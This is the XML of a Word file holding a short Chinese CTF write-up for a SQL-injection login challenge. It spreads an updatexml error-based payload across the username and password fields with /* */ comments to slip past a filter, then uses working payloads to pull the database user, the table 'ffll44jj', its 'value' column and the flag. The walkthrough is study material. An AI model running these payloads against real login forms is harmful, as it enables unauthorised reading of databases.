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4293" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BCD4BA" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>/*                程序作者：爱的伊苏                        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21399673" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>/*                程序完成时间：2019/2/6                    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D7A12" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>/*                有任何问题请联系：740531307@qq.com        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50C92C" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72428582" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t>//@永远得意的笑下去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D08B50C" w14:textId="77777777" w:rsidR="00C96F47" w:rsidRDefault="00C96F47" w:rsidP="00C96F47">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE1DC0" w14:textId="32AB4913" w:rsidR="00E474C9" w:rsidRDefault="00E474C9"/>
    <w:p w14:paraId="701F277B" w14:textId="763A81C2" w:rsidR="000F42B1" w:rsidRDefault="000F42B1"/>
    <w:p w14:paraId="3D90D4DB" w14:textId="0AFB5DBD" w:rsidR="000F42B1" w:rsidRDefault="000F42B1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐使用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HackBar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件，自带POST功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847E1B7" w14:textId="28AB2351" w:rsidR="000F42B1" w:rsidRDefault="000F42B1"/>
    <w:p w14:paraId="48769B3D" w14:textId="38D14CC1" w:rsidR="000F42B1" w:rsidRDefault="000F42B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$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="select * from users where username='$username' and password='$password'"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507A6480" w14:textId="0A987DC2" w:rsidR="000F42B1" w:rsidRDefault="000F42B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为源码所给提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D230B" w14:textId="49C5D1E0" w:rsidR="000F42B1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username=' or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updatexml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/*&amp;password=*/(1,concat(0x3a,(select user())),1) or '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这里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最后为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/* </w:t>
      </w:r>
      <w:r>
        <w:rPr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Fonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最前面为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>*/  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在拼接的时候就实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/* */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注释功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8C9D6" w14:textId="45115AB0" w:rsidR="000F42B1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出题人的意图就是左边不能出现括号，右边不能出现报错函数名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0E362" w14:textId="79B01172" w:rsidR="00496032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729A435D" w14:textId="231737DB" w:rsidR="00496032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CC683C8" w14:textId="16060352" w:rsidR="00496032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username=' or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updatexml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/*&amp;password=*/(1,concat(0x3a,(select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group_concat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table_name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) from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information_schema.tables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where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table_schema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regexp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database())),1) or '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得到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ffll44jj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA0F3E" w14:textId="1FE7AF0B" w:rsidR="00496032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1632F3AB" w14:textId="5002EF5D" w:rsidR="00496032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爆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列名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username=' or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updatexml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/*&amp;password=*/(1,concat(0x3a,(select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group_concat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column_name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) from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information_schema.columns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where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table_name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regexp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'ffll44jj' )),1) or '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得到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value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA597AE" w14:textId="3AB8C055" w:rsidR="00496032" w:rsidRDefault="00496032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5CB759B7" w14:textId="4A24670F" w:rsidR="00496032" w:rsidRDefault="00496032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爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>flag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username=' or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updatexml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/*&amp;password=*/(1,concat(0x3a,(select value from ffll44jj)),1) or '</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0049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33"/>
    <w:rsid w:val="000F42B1"/>
    <w:rsid w:val="001938D0"/>
    <w:rsid w:val="00496032"/>
    <w:rsid w:val="00C73533"/>
    <w:rsid w:val="00C96F47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B43F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D6322B2F-A087-429E-96B4-E4C258DC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2019-02-07T03:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-07T03:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>